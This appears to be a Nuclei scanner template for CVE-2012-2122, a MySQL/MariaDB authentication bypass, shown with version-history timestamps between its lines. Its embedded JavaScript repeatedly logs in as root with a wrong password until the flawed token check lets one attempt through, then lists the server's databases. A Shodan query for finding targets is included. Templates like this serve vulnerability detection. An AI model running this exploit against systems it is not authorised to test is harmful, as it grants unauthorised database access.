2024-03-21 08:20:57 +00:00
id : CVE-2012-2122
info :
name : MySQL - Authentication Bypass
author : pussycat0x
2024-04-03 13:03:52 +00:00
severity : medium
2024-03-21 08:20:57 +00:00
description : |
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
reference :
- https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
2024-04-03 13:03:52 +00:00
- http://kb.askmonty.org/en/mariadb-5162-release-notes/
- http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html
- http://security.gentoo.org/glsa/glsa-201308-06.xml
- http://securitytracker.com/id?1027143
classification :
cvss-metrics : CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P
cvss-score : 5.1
cve-id : CVE-2012-2122
cwe-id : CWE-287
epss-score : 0.97019
epss-percentile : 0.99732
cpe : cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:*
2024-03-21 08:20:57 +00:00
metadata :
verified : true
2024-04-03 13:03:52 +00:00
vendor : oracle
product : mysql
2024-04-08 11:34:33 +00:00
shodan-query : product:"MySQL"
tags : cve,cve2012,js,enum,network,mssql,fuzz
2024-03-21 08:20:57 +00:00
javascript :
- code : |
2024-04-03 12:52:03 +00:00
const mysql = require('nuclei/mysql');
const client = new mysql.MySQLClient;
for (let i = 1; i <= 1001; i++) {
try {
const connected = client.ExecuteQuery(Host, Port, User, Pass, Query);
Export(connected);
break;
} catch {
// error
}
}
2024-03-21 08:20:57 +00:00
args :
Host : "{{Host}}"
Port : 3306
2024-04-03 12:52:03 +00:00
User : "root"
Pass : "wrong"
2024-03-21 08:20:57 +00:00
Query : "show databases;"
matchers :
- type : dsl
dsl :
- "success == true"
2024-04-03 12:52:03 +00:00
2024-03-21 08:20:57 +00:00
extractors :
- type : json
part : response
json :
- .Rows[] | .Database
2024-04-04 03:58:38 +00:00
# digest: 4a0a004730450220257cea6847023e5a3eadf5c1a18c4f2a2df145542fe09c89c61ddad28bfe44e9022100e5936a8580cc7882f2e8c441aff795b4fc479fa6552599a3eb1abca1ac7f9a65:922c64590222798bb761d5b6d8e72950